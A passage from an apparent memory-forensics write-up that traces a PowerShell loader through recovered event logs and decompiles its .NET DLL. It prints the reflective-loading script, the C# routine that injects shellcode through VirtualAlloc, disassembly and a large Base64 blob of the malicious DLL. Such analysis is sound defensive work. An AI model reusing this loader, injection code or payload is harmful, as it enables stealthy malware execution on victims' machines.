<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:49:21.931273"></TimeCreated>
<EventRecordID>565</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Variable</string>
<string>Started</string>
<string> ProviderName=Variable
NewProviderState=Started
SequenceNumber=11
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=572e362c-28a1-40fb-8e11-6906e166d1a2
HostApplication=powershell.exe -Command {Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted}
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
</Events>
We can see a large payload consisting of a Base64-encoded string that is loaded into memory and executed through PowerShell:
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
Let's take the Base64-encoded string and decode it into a file:
$ echo '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' | base64 -d > malware
$ file malware
malware: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
$ mv malware malware.dll
C# .NET decompilation
Since we have a compiled C# .NET DLL, we can use a tool such as JetBrains dotPeek, ILSpy or dnSpy to view the C# source code. These are the relevant functions:
public static void Run()
{
try
{
if (!isVirtual())
{
boom();
}
}
catch
{
}
}
private static void boom()
{
byte[] array = Convert.FromBase64String("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");
IntPtr intPtr = VirtualAlloc(IntPtr.Zero, (uint)array.Length, 4096u, 64u);
Marshal.Copy(array, 0, intPtr, array.Length);
func func = (func)Marshal.GetDelegateForFunctionPointer(intPtr, typeof(func));
func();
VirtualFree(intPtr, 0u, 32768u);
}
Again, the DLL is injecting another Base64-encoded string into memory:
$ echo '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' | base64 -d > malware
$ file malware
malware: DOS executable (COM)
$ mv malware malware.exe
This time, it is not a proper Windows PE:
$ xxd malware.exe | head
00000000: eb00 e863 0600 00eb 0060 3217 1ac7 c146 ...c.....`2....F
00000010: 06d9 1bc1 3f93 0000 5000 4530 140e 4502 ....?...P.E0..E.
00000020: 140e e2f6 27cc 2af3 d333 191f 1f9f cc3b ....'.*..3.....;
00000030: 785b d9c7 ec89 7006 8229 fd25 a565 4153 x[....p..).%.eAS
00000040: 5353 d2da ccc5 807a 6c61 7b61 d7e4 3410 SS.....zla{a..4.
00000050: e1d7 0b9e 04bb c521 fe90 aa6c ee04 7a90 .......!...l..z.
00000060: a2b8 4767 7b4f 3a23 d272 216c f146 0e97 ..Gg{O:#.r!l.F..
00000070: feb6 2662 a51f 0f39 78c9 6835 0511 dff6 ..&b...9x.h5....
00000080: 51f3 13d9 e60f 8ac3 be9a 15e3 3bb8 99ed Q...........;...
00000090: 65d9 1cca e5cb e3ff 2290 8157 829d 546e e......."..W..Tn
Although some of the assembly instructions are valid, reverse engineering this will be hard and time-consuming:
$ pwn disasm $(xxd -p malware.exe)
0: eb 00 jmp 0x2
2: e8 63 06 00 00 call 0x66a
7: eb 00 jmp 0x9
9: 60 pusha
a: 32 17 xor dl, BYTE PTR [edi]
c: 1a c7 sbb al, bh
e: c1 46 06 d9 rol DWORD PTR [esi+0x6], 0xd9
12: 1b c1 sbb eax, ecx
14: 3f aas
15: 93 xchg ebx, eax
16: 00 00 add BYTE PTR [eax], al
18: 50 push eax
19: 00 45 30 add BYTE PTR [ebp+0x30], al
1c: 14 0e adc al, 0xe
1e: 45 inc ebp
1f: 02 14 0e add dl, BYTE PTR [esi+ecx*1]
22: e2 f6 loop 0x1a
24: 27 daa
25: cc int3
...
66a: 41 inc ecx
66b: 5a pop edx
66c: eb 00 jmp 0x66e
66e: 41 inc ecx
66f: 81 6a 02 1f 80 55 d1 sub DWORD PTR [edx+0x2], 0xd155801f
676: 41 inc ecx
677: c1 42 06 80 rol DWORD PTR [edx+0x6], 0x80
67b: 41 inc ecx
67c: 81 6a 0a d9 1b 75 b2 sub DWORD PTR [edx+0xa], 0xb2751bd9
683: 41 inc ecx
684: c1 4a 0e 5c ror DWORD PTR [edx+0xe], 0x5c
688: 41 inc ecx
689: 52 push edx
68a: c3 ret
These tasks should be left for the end, as a last resort. There are more PowerShell logs:
/project $ grep evtx filescan.txt | grep -i powershell
0xdb8d3f64d650 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216
0xdb8d3fd415d0 \Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx 216
0xdb8d401969b0 \Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Admin.evtx 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3fd415d0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3fd415d0 Microsoft-Windows-PowerShell%4Operational.evtx file.0xdb8d3fd415d0.0xdb8d3f410650.DataSectionObject.Microsoft-Windows-PowerShell%4Operational.evtx.dat
SharedCacheMap 0xdb8d3fd415d0 Microsoft-Windows-PowerShell%4Operational.evtx file.0xdb8d3fd415d0.0xdb8d4067e6c0.SharedCacheMap.Microsoft-Windows-PowerShell%4Operational.evtx.vacb
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d401969b0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d401969b0 Microsoft-Windows-PowerShell%4Admin.evtx file.0xdb8d401969b0.0xdb8d3f410790.DataSectionObject.Microsoft-Windows-PowerShell%4Admin.evtx.dat
SharedCacheMap 0xdb8d401969b0 Microsoft-Windows-PowerShell%4Admin.evtx file.0xdb8d401969b0.0xdb8d3fcb2a20.SharedCacheMap.Microsoft-Windows-PowerShell%4Admin.evtx.vacb
Let's analyze the logs:
$ evtx_dump.py 'file.0xdb8d401969b0.0xdb8d3fcb2a20.SharedCacheMap.Microsoft-Windows-PowerShell%4Admin.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
</Events>
$ evtx_dump.py 'file.0xdb8d3fd415d0.0xdb8d4067e6c0.SharedCacheMap.Microsoft-Windows-PowerShell%4Operational.evtx.vacb'
<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 19:19:36.740265"></TimeCreated>
<EventRecordID>74</EventRecordID>
<Correlation ActivityID="{f4bb5d63-53d6-0001-0db7-bbf4d653d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4640" ThreadID="6180"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">ef3681a9-511c-4f5f-8e6d-36ea42cae506</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 19:32:35.490919"></TimeCreated>
<EventRecordID>86</EventRecordID>
<Correlation ActivityID="{677bea27-53da-0001-010b-7c67da53d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="2108" ThreadID="7012"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">68b52918-7f63-44e5-bc15-306a91f7bc1f</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">40961</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>1</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 20:16:05.985413"></TimeCreated>
<EventRecordID>87</EventRecordID>
<Correlation ActivityID="{ebcf3844-53e0-0003-c93a-cfebe053d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4584" ThreadID="4588"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData></EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-10 20:19:38.037548"></TimeCreated>
<EventRecordID>102</EventRecordID>
<Correlation ActivityID="{ebcf3844-53e0-0001-1f4e-cfebe053d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4468" ThreadID="5448"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>DESKTOP-73LR50C</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()</Data>
<Data Name="ScriptBlockId">40d0760f-c12b-4652-8704-6e5cfdd2456d</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
...
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-03-13 02:43:07.168322"></TimeCreated>
<EventRecordID>117</EventRecordID>
<Correlation ActivityID="{8937ba5a-55a0-0001-23d7-3789a055d901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="2288" ThreadID="6784"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>Galax-35</Computer>
<Security UserID="S-1-5-21-3061737852-3666381533-1918146786-1001"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">
$bytes = [System.Convert]::FromBase64String("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EAAAAAAAAAAAAAACRAJYGAAAAAAQAAgAFAAIABgADAAcAAwAAAABfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTMyAF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MTc4MwBDMjU3NEE2QUM1NzNCQkFEM0E1N0ExRjdENTU2OEI2NDcyRDkyNDc2RTIzMkM0MThENDM4QjdBNjc0QzFEQjI3AEE0OTU2OEIyNUZBMzExQzc4NDU2NkIwOEFBODI3ODE5MjQwREIzRkQ0QUFCMjhGQjUwNDFFMzFEQjJGM0UyRTcAPE1vZHVsZT4APFByaXZhdGVJbXBsZW1lbnRhdGlvbkRldGFpbHM+AFBBR0VfRVhFQ1VURV9SRUFEAFBBR0VfR1VBUkQAUEFHRV9OT0NBQ0hFAFBBR0VfV1JJVEVDT01CSU5FAFBBR0VfUkVBRFdSSVRFAFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFAFBBR0VfTk9BQ0NFU1MAUEFHRV9SRUFET05MWQBQQUdFX1dSSVRFQ09QWQBQQUdFX0VYRUNVVEVfV1JJVEVDT1BZAHZhbHVlX18AbXNjb3JsaWIAbWV0aG9kAHNoZWxsY29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASURpc3Bvc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFZhbHVlVHlwZQBEaXNwb3NlAFNlY3VyaXR5VXBkYXR
lAFNoZWxsY29kZURlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZHdTaXplAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBNYXJzaGFsAGtlcm5lbDMyLmRsbAB0ZXN0X2RsbC5kbGwAdGVzdF9kbGwAZ2V0X0l0ZW0AU3lzdGVtAEVudW0AU2VjdXJpdHlBY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWFuYWdlbWVudE9iamVjdENvbGxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBSdW4ATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAFVwZGF0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAVG9Mb3dlcgBNYW5hZ2VtZW50T2JqZWN0RW51bWVyYXRvcgBHZXRFbnVtZXJhdG9yAC5jdG9yAC5jY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ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